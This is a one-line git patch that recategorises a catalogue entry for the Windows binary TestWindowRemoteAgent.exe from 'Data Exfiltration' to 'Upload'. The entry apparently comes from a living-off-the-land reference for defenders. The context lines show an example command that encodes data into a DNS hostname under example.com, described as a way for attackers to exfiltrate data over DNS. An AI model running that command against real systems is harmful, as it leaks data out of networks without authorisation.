From e90d795e6278a94e49e1fb09a48299f58375d15f Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 3 Oct 2023 17:24:36 +0100 Subject: [PATCH] Fixing incorrect category on testwindowremoteagent entry --- yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml index c6bd128..ef3f6d2 100644 --- a/yml/OtherMSBinaries/testwindowremoteagent.yml +++ b/yml/OtherMSBinaries/testwindowremoteagent.yml @@ -7,7 +7,7 @@ Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS Usecase: Attackers may utilize this to exfiltrate data over DNS - Category: Data Exfiltration + Category: Upload Privileges: User MitreID: T1048 OperatingSystem: Windows 10, Windows 11